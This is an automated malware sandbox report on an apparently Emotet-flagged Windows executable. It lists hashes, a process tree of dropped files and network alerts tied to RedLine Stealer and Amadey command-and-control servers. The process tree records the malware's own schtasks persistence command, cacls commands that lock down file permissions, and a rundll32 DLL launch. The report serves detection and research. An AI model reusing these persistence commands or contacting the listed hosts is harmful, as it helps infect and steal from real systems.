Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 24, 2023, 7:34 a.m.	July 24, 2023, 7:40 a.m.

Size	514.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`65c0aab9f3cc5187b6d90b66fc734abc`
SHA256	`fa70300a94862a5e2bab49a39e80784a617c68b1e11ec651d003760c42e80e8d`
CRC32	`5B6A3CB0`
ssdeep	`12288:/Mriy90V78NeF8ndk5mtMRVwcRsds1ylOI1:RyS8NeJ5mq5savo`
PDB Path	wextract.pdb
Yara	UPX_Zero - UPX packed file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet IsPE32 - (no description)

photo170.exe "C:\Users\test22\AppData\Local\Temp\photo170.exe"
2584
- v5161549.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v5161549.exe
  2636
  - v5218568.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v5218568.exe
    2716
    - a2860925.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a2860925.exe
      2764
    - b6900950.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b6900950.exe
      2944
      - danke.exe "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe"
        3052
        
        schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
        2068
        
        cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
        2248
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2380
        
        cacls.exe CACLS "danke.exe" /P "test22:N"
        2484
        
        cacls.exe CACLS "danke.exe" /P "test22:R" /E
        2564
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2664
        
        cacls.exe CACLS "..\3ec1f323b5" /P "test22:N"
        2732
        
        cacls.exe CACLS "..\3ec1f323b5" /P "test22:R" /E
        2848
        
        foto135.exe "C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe"
        1456
        
        x6412530.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x6412530.exe
        1792
        
        g8876974.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g8876974.exe
        2920
        
        h0247653.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h0247653.exe
        2284
        
        j9687903.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\j9687903.exe
        536
        
        fotod25.exe "C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe"
        812
        
        y8069687.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y8069687.exe
        2076
        
        k3151030.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\k3151030.exe
        2112
        
        l8349481.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\l8349481.exe
        1376
        
        n3861378.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n3861378.exe
        1976
        
        an.exe "C:\Users\test22\AppData\Local\Temp\1000040051\an.exe"
        2376
        
        outsidevariety.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\outsidevariety.exe
        192
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        2372
  - c3584474.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c3584474.exe
    1152
- d4057680.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d4057680.exe
  2120
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
files.catbox.moe	A 108.181.20.35	108.181.20.35

IP Address	Status	Action
108.181.20.35	Active	Moloch
164.124.101.2	Active	Moloch
77.91.124.31	Active	Moloch
77.91.68.3	Active	Moloch
77.91.68.30	Active	Moloch
77.91.68.68	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.68.68:19071 -> 192.168.56.101:49180	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49188 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49182 -> 77.91.124.31:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49181 -> 77.91.68.3:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 77.91.68.3:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49186 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49198 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49198 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49182	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.124.31:80 -> 192.168.56.101:49182	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49188	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49186 -> 77.91.68.3:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 77.91.124.31:80 -> 192.168.56.101:49182	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49188	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49188	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49202 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49202 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49202 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49207 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49204 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49210 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49210 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49217 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49217 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49217 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49206 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49206 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49212 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49246 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49219 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49219 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49247 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49247 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49219 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49247 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49246 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49222 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49222 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49222 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49253 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49253 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49220 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49220 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49253 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49220 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49265 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49265 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49265 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49200 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49267 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49267 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49224 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49267 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49276 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49276 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49276 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49225 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49277 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49277 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043233	ET MALWARE RedLine Stealer TCP CnC net.tcp Init	A Network Trojan was detected
TCP 192.168.56.101:49277 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49213 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49279 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49236 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49281 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49236 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49281 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49236 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49281 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.68.68:19071 -> 192.168.56.101:49230	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.101:49242 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49285 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49242 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49285 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49285 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49215 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49291 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49291 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49291 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49242 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49302 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49226 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49302 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49226 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49302 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49226 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49307 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49250 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49307 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49250 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49307 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49250 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49250 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49312 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49312 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49227 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49312 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49313 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49313 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49313 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49234 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49315 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49315 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49180 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49315 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.101:49195 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49195 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49320 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49320 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49195 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
